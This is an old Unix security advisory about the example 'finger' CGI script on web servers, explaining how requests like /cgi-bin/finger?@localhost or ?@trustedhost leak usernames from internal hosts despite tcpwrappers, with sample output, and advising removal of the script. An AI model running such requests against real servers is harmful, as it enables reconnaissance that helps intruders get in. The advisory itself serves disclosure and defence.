COMMAND

    finger.cgi

SYSTEMS AFFECTED

    Systems  running  any  WWW  server  which includes the example CGI
    program "finger".

PROBLEM

    The  following  info  is  baseed  on Corinne Posse Security Notice
    Issue 2.

    Finger,  the  standard  Unix  command  used  to look up users on a
    system, has been deemed a security hole by some sites and in  some
    cases shut off.  Other  variations of finger have been  altered so
    that a  user can  control exactly  what information  about his/her
    login is shared on the local  machine and over the wire. In  other
    instances, tcpwrappers are used so that only trusted systems on  a
    LAN can finger  other machines.   Having the CGI  program "finger"
    installed can breech security in all these instances.

    Finger a site on the net, out of the blue.

        [user@mybox] finger @host.i.want.to.own.com

        /////////////////////////////////////////////////
        *
        * WARNING: Your finger attempt from user@myhost
        * has been recorded in our logs.
        * Any more finger attempts from your host, and
        * we will consider those actions an attack on
        * our host. We will prosecute anyone we feel is
        * intruding onto our network.
        *
        /////////////////////////////////////////////////

        [user@mybox] lynx http://host.i.want.to.own.com/cgi-bin/finger?@localhost

        [localhost.i.want.to.own.com]
        Login    Name                 Tty  Idle  Login Time   Office Office Phone
        lip      Larry I. Peters       qf     -  Feb 19 15:01
        jack     Jack Daniels          pd 23:40  Feb 18 14:44
        jdobman  J. Doberman           p1     3  Feb 19 12:32 Room 101
        jdobman  J. Doberman           q1  2:48  Feb  9 15:57 Room 101
        red      R. Earl Davies       *q5  1:26  Feb 19 08:43

    With that one CGI program,  an entire network's security has  been
    violated.   Imagine  that  host.i.want.to.own.com  has  a  machine
    specifically for processing  orders.  Knowing  a username on  that
    machine makes it a  lot easier for a  potential hacker to get  in.
    If software  such as  tcpwrappers are  in use  on the LAN, chances
    are it  will be  configured so  that local  users can  see who  is
    logged in where.

        [user@mybox] lynx http://host.i.want.to.own.com/cgi-bin/finger?@trustedhost

        [trustedhost]
        Login    Name                 Tty  Idle  Login Time   Office Office Phone
        lip      Larry I. Peters       q1     -  Feb 19 15:01
        jack     Jack Daniels          p0  1:40  Feb 18 14:44

    Now, an entire network has had a security breech, not just one
    system.

SOLUTION

    Most people have no real use for /cgi-bin/finger, the easiest  way
    to take care of this problem is to remove the script.